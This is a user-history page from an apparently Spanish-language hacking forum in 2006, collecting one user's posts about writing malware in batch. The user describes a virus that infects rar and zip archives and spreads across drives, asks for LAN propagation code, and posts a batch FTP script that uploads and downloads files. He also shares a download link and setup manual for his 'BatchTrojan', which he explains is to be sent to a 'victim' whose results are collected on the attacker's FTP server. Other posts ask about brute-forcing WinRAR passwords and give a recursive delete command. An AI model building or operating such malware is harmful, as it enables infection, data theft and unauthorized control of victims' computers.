| |
|
1786
|
Seguridad Informática / Análisis y Diseño de Malware / Propagacion por LAN
|
en: 08 Febrero 2006, 19:58
|
|
Weno, estoy haciendo un virus en batch (kompilado a exe), al kual le e agregado metodos de reproduccion (ademas infecta archivos rar, y se propaga por todos los HD, en fin, lo que ahce un virus normal), lo que le quiero agregar es la propagacion por una red LAN, creo que se hace mediante nbtstat -a ombre_del_pc....pero no estoy seguro...Si algunien tiene el kode (no importa en que lenguaje este, lo voy a entender) lo podria postear para echarle un ojo...
Weno, Salu2 a todos
Hendrix
|
|
|
|
|
1789
|
Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT
|
en: 06 Febrero 2006, 17:19
|
Si me explikan mas sobre esta extension les puedo crear un programa...esta extension se regenera cada vez o es que hay muchas???? Si es que hay muchas y las kieren borrar pongan esto en el MS-dos: cd "C:\Ruta\Donde\Hay\Archivos\aborrar del /s /q *.001 Esto borrara todos los archivos 001 de una carpeta...si kieren borrar mas cambien el direcctorio de carpeta...  Salu2 Hendrix
|
|
|
|
|
1790
|
Programación / Programación VB / Re: Crackeador en VB, como??
|
en: 05 Febrero 2006, 10:56
|
Ok, gracias, si jejeje, ya lo se que existen, pero lo quiero hacer yo mismo...  es que tengo ganas de programar y no sabia que hacer.... Weno, buskare info sobre la API SendMessage, loke no se como hacer es lo del handle... :- :- Weno, es kuestion de leer... Salu2 y Gracias!!! Hendrix
|
|
|
|
|
1791
|
Programación / Programación VB / Re: Crackeador en VB, como??
|
en: 05 Febrero 2006, 00:54
|
|
me entendiste mal...jejeje El TEXTBOX me refiero a donde te pide el pass, por ejemplo, kuando un winrar tiene pass, te sale un rekuadro que te pide el pass, eso es el TExtbox...jejejeje
Weno, komo se hace para que los resultados de los for's se apliken al rekuadro del pass del winrar???
Es esto que no entiendo...
Salu2
Hendrix
|
|
|
|
|
1798
|
Programación / Scripting / Re: Descargar y guardar archivo en BATCH
|
en: 01 Febrero 2006, 07:41
|
|
Para hacer esto necesitas que el archivo este en un FTP...y que el FTP sera tuyo...
Si tienes FTP y dentro tienes un archivo para bajarlo se hace asi:
@echo off echo FTNOMBREDELHOST > C:datos.txt echo TUPASS >> C:datos.txt echo put C:datos.txt datos.txt >> C:datos.txt echo Binary >> C:datos.txt echo get Archivo.zip C:archivo.zip >> C:datos.txt echo bye >> C:datos.txt ftp -s:C:datos.txt ftp.TUFTP.com
Cambia las letras mayuskulas por tu nombre, pass etc y el nombre del archivo.zip por el nombre de lo que kieres deskargar....
Si lo que kieres es descargar un archivo sin que el Internet Explorer te pida si kieres haceptar eso tendrass que modifikarlo en el Registro, aunke yo no se la llave...
Weno, espero te sirve el kode...
Salu2
Hendrix
|
|
|
|
|
1799
|
Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT
|
en: 31 Enero 2006, 23:14
|
|
Lo que intentas hacer lo estoy haciendo apra la creacion de un virus en batch...la funcion del virus es buskar en todos los Diskos duros archivos rar o zip y kopiarse dentro....Para esto es necesario hacer un motor de buskeda, lo ideal es combinar estos komandos: dir, find y for...Lo que no logro hacer es lo del find, que enkuentre el nombre del archivo....
Weno, si alguien sabe komo hacerlo que lo postee...
Salu2
Hendrix
|
|
|
|
|
1800
|
Seguridad Informática / Análisis y Diseño de Malware / BatchTrojan V. BETA by Hendrix (100% batch)
|
en: 31 Enero 2006, 23:08
|
Weno, antes habia otro post de mi troyano, pero MISTERIOSAMENTE desaparecio, no se el motivo de esta MISTERIOSA desaparicion de mi post, pero weno... Os voy a volver a poner el link y aparte un mini-manual: Link: Http://es.geocities.com/cusacoxa/BatchTrojan.zipMini-Manual (editar server y kliente): Para editar az esto tanto en el cliente como en el Server: en edicion buska renombrar y pon esto: ren: echo TUFTP por: elnombre que registraste para entrar en tu FTP ren: TUPASS po: el pass para acceder a tu FTP ren: ftp.TUFTP.com por: el ftp en eke stas registrado (ej: ftp.es.geocities.com) Editas esto en tu server yen el kliente y luego se lo mandas a la viktima, una vez ejekutado el server por la viktima abres el kliente y eliges una opcion y das a enter...luego cierras el cliente, te vas a tu FTP y segun lo que hayas elegido enkontraras un .txt, lo abres y enkontraras el resultado de lo que le enviaste al Server... Espero te haya kedado klaro...  Salu2 Hendrix
|
|
|
|
|
|
| |
|